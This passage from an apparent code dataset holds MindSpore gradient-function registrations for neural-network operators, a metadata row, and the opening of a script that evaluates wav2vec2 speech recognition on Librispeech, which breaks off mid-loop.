_, _, ksizes_row, ksizes_col = self.ksizes
def bprop(x, out, dout):
x_shape = get_shape(x)
x_batch, x_depth, x_row, x_col = x_shape
x_indices_num = x_row * x_col + 1
x_idx = cast(F.tuple_to_array(range(1, x_indices_num)), mstype.float32)
x_idx = reshape(x_idx, (1, 1, x_row, x_col))
x_idx_patch = cast(extract_image_patches(x_idx), mstype.int32)
x_idx_patch = transpose(x_idx_patch, (0, 2, 3, 1))
out_shape = get_shape(out)
_, _, out_row, out_col = out_shape
out_indices_num = out_row * out_col * ksizes_row * ksizes_col
out_idx = F.tuple_to_array(range(out_indices_num))
out_idx = reshape(out_idx, (1, out_row, out_col, ksizes_row * ksizes_col))
idx_tensor = concat((expand_dims(x_idx_patch, -1), expand_dims(out_idx, -1)))
idx_tensor = reshape(idx_tensor, (-1, 2))
sp_shape = (x_indices_num, out_indices_num)
sp_tensor = scatter_nd(idx_tensor, fill(dtype(dout), (out_indices_num,), 1), sp_shape)
sp_tensor = slice_op(sp_tensor, (1, 0), (x_indices_num - 1, out_indices_num))
grad = transpose(dout, (0, 2, 3, 1))
grad = reshape(grad, (x_batch, out_row, out_col, ksizes_row, ksizes_col, x_depth))
grad = transpose(grad, (1, 2, 3, 4, 0, 5))
grad = reshape(grad, (-1, x_batch * x_depth))
jac = matmul(sp_tensor, grad)
dx = reshape(jac, (x_row, x_col, x_batch, x_depth))
dx = transpose(dx, (2, 3, 0, 1))
return (dx,)
return bprop
@bprop_getters.register(P.DepthwiseConv2dNative)
def get_bprop_depthwise_conv2d_native(self):
input_grad = G.DepthwiseConv2dNativeBackpropInput(
self.channel_multiplier, self.kernel_size, self.pad_mode, self.pad, self.pad_list, self.mode, self.stride,
self.dilation, self.group
)
filter_grad = G.DepthwiseConv2dNativeBackpropFilter(
self.channel_multiplier, self.kernel_size, self.pad_mode, self.pad, self.pad_list, self.mode, self.stride,
self.dilation, self.group
)
get_shape = P.Shape()
def bprop(x, w, out, dout):
dx = input_grad(get_shape(x), w, dout)
if env_force_bprop_seq == '1':
x = F.depend(x, dx)
dw = filter_grad(x, get_shape(w), dout)
return dx, dw
return bprop
@bprop_getters.register(P.MaxPoolWithArgmax)
def get_bprop_max_pool_with_argmax(self):
maxpool_grad = G.MaxPoolGradWithArgmax(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode)
def bprop(x, out, dout):
dx = maxpool_grad(x, dout[0], out[1])
return (dx,)
return bprop
@bprop_getters.register(G.MaxPoolGrad)
def get_bprop_max_pool_grad_grad(self):
maxpool_grad_grad = G.MaxPoolGradGrad(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode)
def bprop(x1, x2, grad, out, dout):
dx1 = zeros_like(x1)
dx2 = zeros_like(x2)
dgrad = maxpool_grad_grad(x1, x2, dout)
return (dx1, dx2, dgrad)
return bprop
@bprop_getters.register(G.MaxPoolGradGrad)
def get_bprop_max_pool_grad_grad_grad(self):
maxpool_grad = G.MaxPoolGrad(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode)
def bprop(x1, x2, grad, out, dout):
dx1 = zeros_like(x1)
dx2 = zeros_like(x2)
dgrad = maxpool_grad(x1, x2, dout)
return (dx1, dx2, dgrad)
return bprop
@bprop_getters.register(P.MaxPool)
def get_bprop_max_pool_grad(self):
maxpool_grad = G.MaxPoolGrad(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode,
data_format=self.format)
def bprop(x, out, dout):
dx = maxpool_grad(x, out, dout)
return (dx,)
return bprop
def _windowed_output_size(input_size, ksize, stride, pad_mode):
tmp_output = 0
tmp_pad_need = 0
tmp_pad_before = 0
tmp_pad_after = 0
if pad_mode == 'VALID':
tmp_output = (input_size - ksize + stride) // stride
tmp_pad_before = 0
tmp_pad_after = 0
elif pad_mode == 'SAME':
tmp_output = (input_size + stride - 1) // stride
tmp_pad_need = max(0, (tmp_output - 1) * stride + ksize - input_size)
tmp_pad_before = tmp_pad_need // 2
tmp_pad_after = tmp_pad_need - tmp_pad_before
return tmp_output, tmp_pad_before, tmp_pad_after
@constexpr
def _get_mean_matrix(x_shape, ksize, stride, pad_mode, x_dtype):
n_input, c_input, h_input, w_input = x_shape
h_ksize, w_ksize = ksize[2], ksize[3]
h_stride, w_stride = stride[2], stride[3]
n_output = n_input
c_output = c_input
h_output, w_output = 0, 0
pad_top, pad_bottom, pad_left, pad_right = 0, 0, 0, 0
h_output, pad_top, pad_bottom = _windowed_output_size(h_input, h_ksize,
h_stride, pad_mode)
w_output, pad_left, pad_right = _windowed_output_size(w_input, w_ksize,
w_stride, pad_mode)
output_size = n_output * c_output * h_output * w_output
output_shape = (n_output, c_output, h_output, w_output)
output = np.array([0.0] * output_size)
output = np.reshape(output, output_shape)
in_shape_after_padding_2d = (h_input + pad_top + pad_bottom, w_input + pad_left + pad_right)
assist_input_matrix = np.ones(in_shape_after_padding_2d).astype(np.float32)
if pad_top > 0:
assist_input_matrix[:pad_top, :] = 0
if pad_bottom > 0:
assist_input_matrix[-pad_bottom:, :] = 0
if pad_left > 0:
assist_input_matrix[:, :pad_left] = 0
if pad_right > 0:
assist_input_matrix[:, -pad_right:] = 0
for h in range(h_output):
for w in range(w_output):
curr_input = assist_input_matrix[h*h_stride : h*h_stride + h_ksize, w*w_stride : w*w_stride + w_ksize]
curr_sum = np.sum(curr_input)
if curr_sum > 0:
output[:, :, h, w] = 1. / curr_sum
return Tensor(output, x_dtype)
@constexpr
def _get_kernel_matrix(x_shape_nchw, kernel_matrix_shape, pad_mode, x_dtype):
kernel_matrix = np.ones(kernel_matrix_shape)
return Tensor(kernel_matrix, x_dtype)
@bprop_getters.register(P.AvgPool)
def get_bprop_avg_pool_grad(self):
if self.target == "GPU":
avgpool_grad_gpu = G.AvgPoolGradGpu(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode,
data_format=self.format)
def bprop_gpu(x, out, dout):
dx = avgpool_grad_gpu(x, out, dout)
return (dx,)
bprop_fn = bprop_gpu
elif self.target == "CPU":
avgpool_grad_cpu = G.AvgPoolGradCpu(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode,
data_format=self.format)
def bprop_cpu(x, out, dout):
dx = avgpool_grad_cpu(x, out, dout)
return (dx,)
bprop_fn = bprop_cpu
elif self.target == "GE":
avgpool_grad_ge = G.AvgPoolGrad(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode)
shape_op = P.Shape()
def bprop_ge(x, out, dout):
dx = avgpool_grad_ge(shape_op(x), dout)
return (dx,)
bprop_fn = bprop_ge
else:
avgpool_grad_vm = G.AvgPoolGradVm(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode)
k_size_nchw = avgpool_grad_vm.kernel_size
stride_nchw = avgpool_grad_vm.strides
pad_mode = self.pad_mode
def bprop_vm(x, out, dout):
x_shape_nchw = F.shape(x)
x_dtype = F.dtype(x)
kernel_matrix_shape = (1, x_shape_nchw[1],
k_size_nchw[2],
k_size_nchw[3])
mean_matrix = _get_mean_matrix(x_shape_nchw, k_size_nchw, stride_nchw, pad_mode, x_dtype)
kernel_matrix = _get_kernel_matrix(x_shape_nchw, kernel_matrix_shape, pad_mode, x_dtype)
dx = avgpool_grad_vm(x_shape_nchw, dout, mean_matrix, kernel_matrix)
return (dx,)
bprop_fn = bprop_vm
return bprop_fn
@bprop_getters.register(P.DropoutGenMask)
def get_bprop_dropout_gen_mask(self):
def bprop(shape, keep_prob, out, dout):
return (zeros_like(shape), zeros_like(keep_prob))
return bprop
@bprop_getters.register(P.DropoutDoMask)
def get_bprop_dropout_do_mask(self):
do_mask = P.DropoutDoMask()
def bprop(x, y, keep_prob, out, dout):
return (do_mask(dout, y, keep_prob), zeros_like(y), zeros_like(keep_prob))
return bprop
@bprop_getters.register(P.Mish)
def get_bprop_mish(self):
tanh = P.Tanh()
tanh_grad = SG.TanhGrad()
softplus = P.Softplus()
softplus_grad = G.SoftplusGrad()
def bprop(x, out, dout):
dx1 = tanh(softplus(x))
dx2 = softplus_grad(tanh_grad(dx1, x * dout), x)
dx = (dx1 * dout + dx2)
return (dx,)
return bprop
@bprop_getters.register(P.SeLU)
def get_bprop_selu(self):
scale = 1.0507009873554804934193349852946
elu_grad = G.EluGrad()
def bprop(x, out, dout):
dx = elu_grad(dout, out) * scale
return (dx,)
return bprop
@bprop_getters.register(P.MulNoNan)
def get_bprop_mul_no_nan(self):
mul_no_nan = P.MulNoNan()
reduce_sum = P.ReduceSum()
reshape = P.Reshape()
def bprop(x, y, out, dout):
x_shape = F.shape(x)
y_shape = F.shape(y)
dx = mul_no_nan(dout, y)
dy = mul_no_nan(x, dout)
broadcast_x, broadcast_y = F.broadcast_gradient_args(x_shape, y_shape)
if broadcast_x != ():
dx = reshape(reduce_sum(dx, broadcast_x), x_shape)
if broadcast_y != ():
dy = reshape(reduce_sum(dy, broadcast_y), y_shape)
return dx, dy
return bprop
@bprop_getters.register(P.ReLU)
def get_bprop_relu(self):
input_grad = G.ReluGrad()
def bprop(x, out, dout):
dx = input_grad(dout, out)
return (dx,)
return bprop
@bprop_getters.register(G.ReluGrad)
def get_bprop_relu_grad(self):
input_grad = G.ReluGrad()
def bprop(grad, y, out, dout):
dgrad = input_grad(dout, y)
return dgrad, zeros_like(y)
return bprop
@bprop_getters.register(P.ReLU6)
def get_bprop_relu6(self):
input_grad = G.ReLU6Grad()
def bprop(x, out, dout):
dx = input_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.ReLUV2)
def get_bprop_relu_v2(self):
input_grad = G.ReluGradV2()
def bprop(x, out, dout):
mask = out[1]
dx = input_grad(dout[0], mask)
return (dx,)
return bprop
@bprop_getters.register(P.HSwish)
def get_bprop_hswish(self):
input_grad = G.HSwishGrad()
def bprop(x, out, dout):
dx = input_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.HSigmoid)
def get_bprop_hsigmoid(self):
input_grad = G.HSigmoidGrad()
def bprop(x, out, dout):
dx = input_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.Elu)
def get_bprop_elu(self):
input_grad = G.EluGrad()
def bprop(x, out, dout):
dx = input_grad(dout, out)
return (dx,)
return bprop
@bprop_getters.register(P.Sigmoid)
def get_bprop_sigmoid(self):
input_grad = G.SigmoidGrad()
def bprop(x, out, dout):
dx = input_grad(out, dout)
return (dx,)
return bprop
@bprop_getters.register(G.SigmoidGrad)
def get_bprop_sigmoid_grad(self):
sigmoid_grad = G.SigmoidGrad()
def bprop(y, grad, out, dout):
dy = dout * grad * (1. - 2 * y)
dgrad = sigmoid_grad(y, dout)
return dy, dgrad
return bprop
@constexpr
def _get_transpose_axis(x_shp, axis):
rank = len(x_shp)
if axis < 0:
axis += rank
reverse_axis = [i for i in range(rank)]
reverse_axis[axis] = rank - 1
reverse_axis[rank - 1] = axis
return tuple(reverse_axis)
@bprop_getters.register(P.Softmax)
def get_bprop_softmax(self):
sum_func = P.ReduceSum(keep_dims=True)
sub = P.Sub()
mul = P.Mul()
get_shape = P.Shape()
transpose = P.Transpose()
axis = self.axis
if not isinstance(axis, int):
axis = axis[0]
def bprop(x, out, dout):
reverse_axis = _get_transpose_axis(get_shape(x), axis)
out = transpose(out, reverse_axis)
dout = transpose(dout, reverse_axis)
dx = mul(out, sub(dout, sum_func(mul(out, dout), -1)))
dx = transpose(dx, reverse_axis)
return (dx,)
return bprop
@bprop_getters.register(P.LogSoftmax)
def get_bprop_log_softmax(self):
logsoftmax_grad = G.LogSoftmaxGrad(self.axis)
def bprop(x, out, dout):
dx = logsoftmax_grad(out, dout)
return (dx,)
return bprop
@bprop_getters.register(P.Softplus)
def get_bprop_softplus(self):
softplus_grad = G.SoftplusGrad()
def bprop(x, out, dout):
dx = softplus_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.Softsign)
def get_bprop_softsign(self):
mul = P.Mul()
absolute = P.Abs()
div = P.Div()
square = P.Square()
def bprop(x, out, dout):
dx = mul(dout, div(1, square(1 + absolute(x))))
return (dx,)
return bprop
@bprop_getters.register(P.Tanh)
def get_bprop_tanh(self):
tanh_grad = SG.TanhGrad()
def bprop(x, out, dout):
dx = tanh_grad(out, dout)
return (dx,)
return bprop
@bprop_getters.register(G.TanhGrad)
def get_bprop_tanh_grad(self):
tanh_grad = G.TanhGrad()
def bprop(y, grad, out, dout):
dy = dout * -2.0 * grad * y
dgrad = tanh_grad(y, dout)
return dy, dgrad
return bprop
@bprop_getters.register(P.Gelu)
def get_bprop_gelu(self):
input_grad = G.GeluGrad()
def bprop(x, out, dout):
dx = input_grad(dout, x, out)
return (dx,)
return bprop
@bprop_getters.register(P.FastGelu)
def get_bprop_fast_gelu(self):
input_grad = G.FastGeluGrad()
def bprop(x, out, dout):
dx = input_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.FusedBatchNorm)
def get_bprop_fused_batch_norm(self):
input_grad = G.FusedBatchNormGrad(self.epsilon, self.momentum)
target_cpu = False
if self.target == "CPU":
input_grad = G.FusedBatchNormGradCPU(self.epsilon, self.momentum)
target_cpu = True
def bprop(x, scale, b, mean, variance, out, dout):
saved_mean = out[3]
saved_variance = out[4]
if target_cpu:
out = input_grad(dout[0], x, scale, b, saved_mean, saved_variance)
else:
out = input_grad(dout[0], x, scale, saved_mean, saved_variance)
dx = out[0]
dscale = out[1]
dbias = out[2]
return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
return bprop
@bprop_getters.register(P.FusedBatchNormEx)
def get_bprop_fused_batch_norm_ex(self):
input_grad = G.FusedBatchNormGradEx(self.epsilon, self.momentum, self.format)
def bprop(x, scale, b, mean, variance, out, dout):
saved_mean = out[3]
saved_variance = out[4]
reserve = out[5]
out = input_grad(dout[0], x, scale, saved_mean, saved_variance, reserve)
dx = out[0]
dscale = out[1]
dbias = out[2]
return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
return bprop
@bprop_getters.register(P.InstanceNorm)
def get_bprop_instance_norm(self):
is_training = self.is_training
input_grad = G.InstanceNormGrad(is_training, self.epsilon, self.momentum)
def bprop(x, gamma, beta, mean, variance, out, dout):
saved_mean = out[1]
saved_variance = out[2]
out = input_grad(dout[0], x, gamma, saved_mean, saved_variance)
dx = out[0]
dgamma = out[1]
dbeta = out[2]
return dx, dgamma, dbeta, zeros_like(mean), zeros_like(variance)
return bprop
@bprop_getters.register(P.BatchNorm)
def get_bprop_batch_norm(self):
is_training = self.is_training
input_grad = G.BatchNormGrad(is_training, self.epsilon)
def bprop(x, scale, b, mean, variance, out, dout):
if is_training:
saved_reserve_1 = out[3]
saved_reserve_2 = out[4]
else:
saved_reserve_1 = mean
saved_reserve_2 = variance
out = input_grad(dout[0], x, scale, saved_reserve_1, saved_reserve_2)
dx = out[0]
dscale = out[1]
dbias = out[2]
return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
return bprop
@bprop_getters.register(P.LayerNorm)
def get_bprop_layer_norm(self):
layer_norm_grad = G.LayerNormGrad(self.begin_norm_axis, self.begin_params_axis)
def bprop(x, gamma, beta, out, dout):
dx, d_gamma, d_beta = layer_norm_grad(
x, dout[0], out[2], out[1], gamma)
return dx, d_gamma, d_beta
return bprop
@bprop_getters.register(G.LayerNormGrad)
def get_bprop_layer_norm_grad(self):
layer_norm_grad_grad = G.LayerNormGradGrad(self.begin_norm_axis, self.begin_params_axis)
def bprop(x, dy, variance, mean, gamma, out, dout):
d_x, d_dy, d_gamma = layer_norm_grad_grad(
x, dy, variance, mean, gamma, dout[0], dout[1], dout[2])
return d_x, d_dy, zeros_like(variance), zeros_like(mean), d_gamma
return bprop
@bprop_getters.register(P.L2Normalize)
def get_bprop_l2normalize(self):
input_grad = G.L2NormalizeGrad(self.axis, self.epsilon)
def bprop(x, out, dout):
dx = input_grad(x, out, dout)
return (dx,)
return bprop
@bprop_getters.register(P.SoftmaxCrossEntropyWithLogits)
def get_bprop_softmax_cross_entropy_with_logits(self):
expand = P.ExpandDims()
def bprop(logits, labels, out, dout):
grad = out[1]
grad = grad * expand(dout[0], -1)
return grad, zeros_like(labels)
return bprop
@bprop_getters.register(P.NLLLoss)
def get_bprop_nll_loss(self):
nll_loss_grad = G.NLLLossGrad(reduction=self.reduction)
def bprop(x, target, weight, out, dout):
total_weight = out[1]
dout_x = dout[0]
dx = nll_loss_grad(x, dout_x, target, weight, total_weight)
return dx, zeros_like(target), zeros_like(weight)
return bprop
@bprop_getters.register(P.SparseSoftmaxCrossEntropyWithLogits)
def get_bprop_sparse_softmax_cross_entropy_with_logits(self):
is_grad = self.is_grad
grad_op = P.SparseSoftmaxCrossEntropyWithLogits(is_grad=True)
def bprop(logits, labels, out, dout):
grad = out[0]
if not is_grad:
grad = grad_op(logits, labels)
grad = F.depend(grad, out)
grad = grad * dout
return grad, zeros_like(labels)
return bprop
@bprop_getters.register(P.ResizeBilinear)
def get_bprop_resize_bilinear(self):
resize_grad = G.ResizeBilinearGrad(self.align_corners)
def bprop(x, out, dout):
dx = resize_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.OneHot)
def get_bprop_onehot(self):
def bprop(indices, depth, on_value, off_value, out, dout):
return zeros_like(indices), zeros_like(depth), zeros_like(on_value), zeros_like(off_value)
return bprop
@constexpr
def _range_op(start, limit, delta, dtype):
output_tensor = Tensor(list(range(start, limit, delta)), dtype)
return output_tensor
@constexpr
def _get_1d_shape(in_shape):
out_shape = 1
for i in in_shape:
out_shape *= i
return (out_shape,)
@bprop_getters.register(P.TopK)
def get_bprop_top_kv2(self):
scatter = P.ScatterNd()
expand_dims = P.ExpandDims()
shape_op = P.Shape()
reshape_op = P.Reshape()
dtype = P.DType()
def bprop(input_x, k, out, dout):
in_shape = shape_op(input_x)
in_lastdim = in_shape[-1]
indices = out[1]
ind_shape = shape_op(indices)
ind_lastdim = ind_shape[-1]
ind_2d = reshape_op(indices, (-1, ind_lastdim))
outerdim = shape_op(ind_2d)[0]
indices_dtype = dtype(indices)
range_flatten_index = _range_op(0, outerdim * in_lastdim, in_lastdim, indices_dtype)
ind = reshape_op(ind_2d + expand_dims(range_flatten_index, -1), (-1,))
in_shape_1d = _get_1d_shape(in_shape)
out_grad = reshape_op(
scatter(
expand_dims(ind, -1),
reshape_op(dout[0], (-1,)),
in_shape_1d),
in_shape)
return out_grad, zeros_like(k)
return bprop
@bprop_getters.register(P.SmoothL1Loss)
def get_bprop_smooth_l1_loss(self):
grad = G.SmoothL1LossGrad(self.beta)
def bprop(prediction, target, out, dout):
dx = grad(prediction, target, dout)
dy = grad(target, prediction, dout)
return dx, dy
return bprop
@bprop_getters.register(P.L2Loss)
def get_bprop_l2_loss(self):
def bprop(x, out, dout):
dx = x * dout
return (dx,)
return bprop
@bprop_getters.register(P.RNNTLoss)
def get_bprop_rnnt_loss(self):
def bprop(acts, labels, act_lens, label_lens, out, dout):
grad = out[1]
return grad, zeros_like(labels), zeros_like(act_lens), zeros_like(label_lens)
return bprop
@bprop_getters.register(P.PReLU)
def get_bprop_prelu(self):
grad = G.PReLUGrad()
def bprop(x, w, out, dout):
dx, dw = grad(dout, x, w)
return dx, dw
return bprop
@bprop_getters.register(P.LSTM)
def get_bprop_lstm(self):
lstm_grad_data = G.LSTMGradData(
input_size=self.input_size,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
has_bias=self.has_bias,
bidirectional=self.bidirectional,
dropout=self.dropout
)
lstm_grad_weight = G.LSTMGradWeight(
input_size=self.input_size,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
has_bias=self.has_bias,
bidirectional=self.bidirectional,
dropout=self.dropout
)
lstm_grad = G.LSTMGrad(
input_size=self.input_size,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
has_bias=self.has_bias,
bidirectional=self.bidirectional,
dropout=self.dropout
)
def bprop(x, hx, cx, w, out, dout):
y, _, _, reserve, state = out
dy, dhy, dcy, _, _ = dout
dx, dhx, dcx = lstm_grad_data(y, dy, dhy, dcy, w, hx, cx, reserve, state)
dw = lstm_grad_weight(F.depend(x, dx), hx, y, reserve, state)
return dx, dhx, dcx, dw
def bprop_cpu(x, hx, cx, w, out, dout):
y, hy, cy, reserve, _ = out
dy, dhy, dcy, _, _ = dout
dx, dhx, dcx, dw = lstm_grad(x, hx, cx, w, y, hy, cy, dy, dhy, dcy, reserve)
return dx, dhx, dcx, dw
if context.get_context('device_target') == "CPU":
return bprop_cpu
return bprop
@bprop_getters.register(P.DynamicRNN)
def get_bprop_dynamic_rnn(self):
dynamic_rnn_grad = G.DynamicRNNGrad(cell_type=self.cell_type,
direction=self.direction,
cell_depth=self.cell_depth,
use_peephole=self.use_peephole,
keep_prob=self.keep_prob,
cell_clip=self.cell_clip,
num_proj=self.num_proj,
time_major=self.time_major,
forget_bias=self.forget_bias)
expand_dims = P.ExpandDims()
def bprop(x, w, b, seq_length, init_h, init_c, out, dout):
dy, dh, dc, _, _, _, _, _, = dout
dh = dh[-1]
dc = dc[-1]
y, h, c, i, j, f, o, tanhct = out
dw, db, dx, dh_prev, dc_prev = dynamic_rnn_grad(x, w, b, y, init_h[0], init_c[0], h,
c, dy, dh, dc, i, j, f, o, tanhct)
dh_prev = expand_dims(dh_prev, 0)
dc_prev = expand_dims(dc_prev, 0)
return dx, dw, db, (0), dh_prev, dc_prev
return bprop
@bprop_getters.register(P.DynamicGRUV2)
def get_bprop_dynamic_gru_v2(self):
dynamic_gru_v2_grad = G.DynamicGRUV2Grad(self.direction, self.cell_depth, self.keep_prob, self.cell_clip,
self.num_proj, self.time_major, self.gate_order,
self.reset_after)
def bprop(x, winput, whidden, binput, bhidden, seq, init_h, out, dout):
y, out_h, update, reset, new, hidden_new = out
dy, dout_h, _, _, _, _ = dout
dw_input, dw_hidden, db_input, db_hidden, dx, dh_prev = dynamic_gru_v2_grad(x, winput, whidden, y, init_h,
out_h, dy, dout_h[-1], update,
reset, new, hidden_new, None, None)
return dx, dw_input, dw_hidden, db_input, db_hidden, (0), dh_prev
return bprop
@bprop_getters.register(P.SigmoidCrossEntropyWithLogits)
def get_bprop_sigmoid_crossentropy_with_logits(self):
op = G.SigmoidCrossEntropyWithLogitsGrad()
def bprop(x, y, out, dout):
dx = op(x, y, dout)
return (dx, zeros_like(y))
return bprop
@bprop_getters.register(P.Pad)
def get_bprop_pad(self):
shape_op = P.Shape()
paddings = self.paddings
def bprop(x, out, dout):
begin = ()
for item in paddings:
begin += (item[0],)
shp = shape_op(x)
dx = P.Slice()(dout, begin, shp)
return (dx,)
return bprop
@bprop_getters.register(P.MirrorPad)
def get_bprop_mirror_pad(self):
mirror_pad_grad = G.MirrorPadGrad(self.mode)
def bprop(x, paddings, out, dout):
dx = mirror_pad_grad(dout, paddings)
return (dx, zeros_like(paddings))
return bprop
@bprop_getters.register(P.ROIAlign)
def get_bprop_roi_align(self):
shape_op = P.Shape()
pooled_height = self.pooled_height
pooled_width = self.pooled_width
spatial_scale = self.spatial_scale
sample_num = self.sample_num
def bprop(inputs, rois, out, dout):
inputs_shape = shape_op(inputs)
dx = G.ROIAlignGrad(inputs_shape,
pooled_height,
pooled_width,
spatial_scale,
sample_num,
)(dout, rois)
return dx, zeros_like(rois)
return bprop
@bprop_getters.register(P.Conv2DBackpropInput)
def get_bprop_conv2d_backprop_input(self):
filter_grad = G.Conv2DBackpropFilter(
self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
)
input_grad = P.Conv2D(
self.out_channel, self.kernel_size, pad_mode=self.pad_mode.lower(), pad=self.pad,
dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
)
def bprop(x, w, f_sizes, out, dout):
dx = input_grad(dout, w)
if env_force_bprop_seq == '1':
x = F.depend(x, dx)
dw = filter_grad(x, dout, F.shape(w))
return dx, dw, zeros_like(f_sizes)
return bprop
@bprop_getters.register(P.BinaryCrossEntropy)
def get_bprop_binary_cross_entropy(self):
grad = G.BinaryCrossEntropyGrad(self.reduction)
def bprop(x, y, weight, out, dout):
dx = grad(x, y, dout, weight)
return dx, zeros_like(y), zeros_like(weight)
return bprop
@bprop_getters.register(P.KLDivLoss)
def get_bprop_kl_div_loss(self):
grad = G.KLDivLossGrad(self.reduction)
def bprop(x, y, out, dout):
dx, dy = grad(x, y, dout)
return dx, dy
return bprop
@bprop_getters.register(P.Dropout)
def get_bprop_dropout(self):
grad = G.DropoutGrad(self.keep_prob)
def bprop(x, out, dout):
_, mask = out
dy, _ = dout
dx = grad(dy, mask)
return (dx,)
return bprop
@bprop_getters.register(P.CTCLoss)
def get_bprop_ctc_loss(self):
expand = P.ExpandDims()
def bprop(inputs, labels_indices, labels_values, sequence_length, out, dout):
grad_loss = out[1]
grad = grad_loss * expand(dout[0], -1)
return grad, zeros_like(labels_indices), zeros_like(labels_values), zeros_like(sequence_length)
return bprop
@bprop_getters.register(P.BasicLSTMCell)
def get_bprop_basic_lstm_cell(self):
basic_lstm_cell_cstate_grad = G.BasicLSTMCellCStateGrad(
forget_bias=self.forget_bias,
activation=self.activation
)
basic_lstm_cell_weight_grad = G.BasicLSTMCellWeightGrad()
basic_lstm_cell_input_grad = G.BasicLSTMCellInputGrad(keep_prob=self.keep_prob)
def bprop(x, h, c, w, b, out, dout):
_, _, it, jt, ft, ot, tanhct = out
dct, dht, _, _, _, _, _ = dout
dgate, dct_1 = basic_lstm_cell_cstate_grad(c, dht, dct, it, jt, ft, ot, tanhct)
dxt, dht = basic_lstm_cell_input_grad(dgate, w)
dw, db = basic_lstm_cell_weight_grad(F.depend(x, dxt), h, dgate)
return dxt, dht, dct_1, dw, db
return bprop
@bprop_getters.register(P.LRN)
def get_bprop_lrn(self):
grad = G.LRNGrad(self.depth_radius, self.bias, self.alpha, self.beta)
def bprop(x, out, dout):
dx = grad(dout, x, out)
return (dx,)
return bprop
| true | true |
f722ed27fc2d0b1605d157e7f5caaaf6ffadd8cf | 5,039 | py | Python | example/evalutate_wav2vec2/evaluate_wav2vec2_librispeech.py | mthrok/ctcdecode | b1a30d7a65342012e0d2524d9bae1c5412b24a23 | [
"MIT"
] | 8 | 2021-06-17T19:43:36.000Z | 2021-10-12T04:49:36.000Z | example/evalutate_wav2vec2/evaluate_wav2vec2_librispeech.py | mthrok/ctcdecode | b1a30d7a65342012e0d2524d9bae1c5412b24a23 | [
"MIT"
] | null | null | null | example/evalutate_wav2vec2/evaluate_wav2vec2_librispeech.py | mthrok/ctcdecode | b1a30d7a65342012e0d2524d9bae1c5412b24a23 | [
"MIT"
] | 2 | 2021-07-14T06:15:55.000Z | 2021-08-01T14:00:22.000Z | #!/usr/bin/env python3
"""Generate `trn` files for Librispeech
Given a Librispeech directory, parse transcript files,
transcribe the corresponding audio, and generate hypothesis files.
"""
import os
import time
import logging
import argparse
from pathlib import Path
import torch
import torchaudio
import fairseq
import simple_ctc
_LG = logging.getLogger(__name__)
def _parse_args():
def _path(path):
return Path(os.path.normpath(path))
parser = argparse.ArgumentParser(
description=__doc__,
)
parser.add_argument(
'--root-dir',
required=True,
type=_path,
help='The root directory on which data are persed.'
)
parser.add_argument(
'--output-dir',
required=True,
type=_path,
help='The output directory where trn files are generated.'
)
parser.add_argument(
'--model-file',
required=True,
type=_path,
help='Path to a finetuned weight file.'
)
parser.add_argument(
'--dict-file',
required=True,
type=_path,
help='Path to `dict.ltr.txt` file.'
)
parser.add_argument(
'--num-threads',
type=int,
default=4,
help='Maximum number of threads .'
)
args = parser.parse_args()
for path in [args.root_dir, args.output_dir, args.model_file, args.dict_file]:
if not os.path.exists(path):
raise RuntimeError(f'File or directory does not exist: {path}')
return args
def _parse_transcript(path):
with open(path) as trans_fileobj:
for line in trans_fileobj:
line = line.strip()
if not line:
continue
id, transcription = line.split(' ', maxsplit=1)
yield id, transcription
def _parse_transcriptions(root_dir, output_dir):
_LG.info('Parsing transcriptions')
audios = []
trn = output_dir / 'ref.trn'
txt = output_dir / 'ref.trans.txt'
with open(trn, 'w') as trn_fileobj, open(txt, 'w') as txt_fileobj:
for trans_file in root_dir.glob('**/*.trans.txt'):
trans_dir = trans_file.parent
for id, transcription in _parse_transcript(trans_file):
trn_fileobj.write(f'{transcription} ({id})\n')
txt_fileobj.write(f'{id} {transcription}\n')
audio_path = trans_dir / f'{id}.flac'
audios.append((id, audio_path))
return audios
def _load_vocab(dict_file):
tokens = ["<s>", "<pad>", "</s>", "<unk>"]
with open(dict_file, mode='r', encoding='utf-8') as fileobj:
for line in fileobj:
tokens.append(line.split()[0])
return tokens
def _count_params(model):
return sum(p.numel() for p in model.parameters())
def _load_model(model_file, dict_file):
_LG.info('Loading the model')
labels = _load_vocab(dict_file)
overrides = {'data': str(dict_file.parent)}
models, _, _ = fairseq.checkpoint_utils.load_model_ensemble_and_task(
[str(model_file)], arg_overrides=overrides
)
model = models[0].eval()
encoder = model.w2v_encoder
decoder = simple_ctc.BeamSearchDecoder(
labels,
cutoff_top_n=40,
cutoff_prob=0.8,
beam_size=100,
num_processes=1,
blank_id=0,
is_nll=True,
)
_LG.info('#parameters: %s', _count_params(encoder))
return encoder, decoder
def _decode(audios, encoder, decoder, output_dir):
trn = output_dir / 'hyp.trn'
trans = output_dir / 'hyp.trans.txt'
t_enc, t_dec, num_frames = 0.0, 0.0, 0
with open(trn, 'w') as trn_fileobj, open(trans, 'w') as txt_fileobj:
for i, (id, path) in enumerate(audios):
waveform, _ = torchaudio.load(path)
mask = torch.zeros_like(waveform)
t0 = time.monotonic()
ir = encoder(waveform, mask)['encoder_out'].transpose(1, 0)
t1 = time.monotonic()
result = decoder.decode(ir)
t2 = time.monotonic()
